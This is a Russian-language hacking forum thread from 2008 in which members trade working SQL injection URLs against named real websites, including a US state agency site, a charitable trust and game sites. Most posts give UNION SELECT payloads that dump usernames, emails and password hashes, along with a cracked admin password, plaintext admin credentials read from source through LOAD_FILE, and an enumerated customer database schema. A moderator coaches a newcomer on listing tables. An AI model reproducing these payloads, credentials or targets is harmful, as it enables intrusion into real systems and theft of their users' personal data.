Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.07.2008, 19:39
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
[ http://www.agr.state.il.us ] PR=6
SQL inj:
http://www.agr.state.il.us/dq/news.php?pg=-1+union+select+1,2,3,4,concat(username,char(58),pa ssword),6,7+from+users+limit+0,1/*
admin:4523881b262ee504809c1e11812ad5b4 => lavalamp
Админка:
http://www.agr.state.il.us/dq/admin/admin.php
(с админкой загон... авторизацию не нашёл..)
|
|
|
09.07.2008, 20:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-1+union+select+1,LOAD_FILE(0x2f686f6d652f736974652 f68617264766973696f6e2e72752f7765622f61646d696e2f6 1646d696e2e70687033),3/*
В сорсах смотрим и вуля... Пароль хранится не в бд
PHP код:
<?php
if ($db=='news'){
if ($author =='Reg' && $password=='regulator'){include "news/formindexstart.php";}
if ($author=='Digit' && $password=='mityap'){include "news/formindexstart.php";}
if ($author=='Nitro' && $password=='asdbnmiop'){include "news/formindexstart.php";}
if ($author=='George' && $password=='dolin'){include "news/formindexstart.php";}
}
elseif ($db=='files'){
if ($author=='Reg' && $password=='regulator'){include "files/formindex.php3";}
if ($author=='Gigit' && $password=='mityap'){include "files/formindex.php3";}
if ($author=='Nitro' && $password=='asdbnmiop'){include "files/formindex.php3";}
}
?>
Последний раз редактировалось The matrix; 09.07.2008 в 20:17..
|
|
|
|
09.07.2008, 21:03
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Churchilltrust.com.au - PR 5
http://www.churchilltrust.com.au/content.php?id=-1+union+select+1,2,3,unhex(hex(version())),5,6,7,8 ,9,10,11/*
увы 4.
http://www.churchilltrust.com.au/content.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6,7,8,9,10,11+from+users/*
хехе угадал )
http://www.soaw.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22
а вот тут не угадал... заеб подбирать(
Последний раз редактировалось sabe; 09.07.2008 в 22:15..
|
|
|
|
10.07.2008, 08:58
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573
Репутация:
185
|
|
TARGET: http://mnogobd.ru/
USER(): a1mnogobd_art@localhost
DATABASE(): a1mnogobd_mnog
VERSION(): 5.0.37-standard-log
SQL-inj:
Код:
http://www.mnogobd.ru/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14/*
Раскрытые пути
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 6
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 10
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 14
Вот как-то так)
|
|
|
|
10.07.2008, 12:13
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Код:
http://www.xgamestation.com/view_product.php?id=-1%20UNION%20ALL%20SELECT%201,concat_ws(0x3a,username,user_email,user_password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20from%20phpbb_users%20Limit%204500,1--
Код:
http://www.gamershood.com/game.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+user+limit+20000,1--
Код:
http://babaguga.com/showcat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
|
|
|
|
10.07.2008, 15:24
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Сообщение от -=Static=-
TARGET: http://mnogobd.ru/
SQL-inj:
Код:
http://www.mnogobd.ru/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14/*
Раскрутил:
Актуальные Таблицы и колонки:
Код:
-bag
--cena
--count
--id_zakaz
--summa
-client
--email
--tel
--cur_data
--id_client
--dop_info
--adress
-region
--name_region
-rubrika
--name_rubrika
-t_news
--small_msg
--title_news
--k_slov_news
--zag_news
--msg
-tovar
--stoimost
--name
--region
--vipusk
--prinadl
--img
--new
--opisanie
--top
--title_tov
--k_slov_tov
--excluziv
--sbornik
Код:
http://www.mnogobd.ru/info.php?id=-1+union+select+1,concat_ws(0x3a,email,id_client),3,4,5,6,7,8,9,10,11,12,13,14+From+client
|
|
|
|
10.07.2008, 15:39
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 100
Провел на форуме:
226029
Репутация:
3
|
|
http://opac.iuav.it/sbda/main.php?section=-200+union+select+1,2,3,4,5,6,7,8/*
version() - 5.0.37-community
database() - WebMenu
user() - sbda@sally.iuav.it
Admin, sbda_authors - нашол 2 таблици подходящие . sbda_authors тут подобрал только логин-admin. пароль не смог  может ктото докопает) |
|
|
|
10.07.2008, 16:42
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897
Репутация:
3
|
|
Я новичок! Скажите плиз эт уязвимость?
http://www.ac-psych.org/?id=1'/*
Если да то какое название поля?
Заранее спасибо!
|
|
|
|
10.07.2008, 16:50
|
|
Banned
Регистрация: 08.04.2006
Сообщений: 15
Провел на форуме:
67450
Репутация:
-2
|
|
http://www.ac-psych.org/?id=-1+union+select+version()/*
http://www.ac-psych.org/?id=-1+union+select+table_name+from+information_schema. tables+limit+1,1/*
Последний раз редактировалось SponS; 10.07.2008 в 16:54..
|
|
|
|
10.07.2008, 16:53
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
masterBlack, не пиши пож. большими буквами.
http://www.ac-psych.org/?id=1%20union%20select%20table_name%20FROM%20INFOR MATION_SCHEMA.TABLES%20limit%2017,1
меняй N - limit N,1 и см. таблицы. Ознакомься с этой темой (FAQ):
https://forum.antichat.ru/threadnav43966-1-10.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
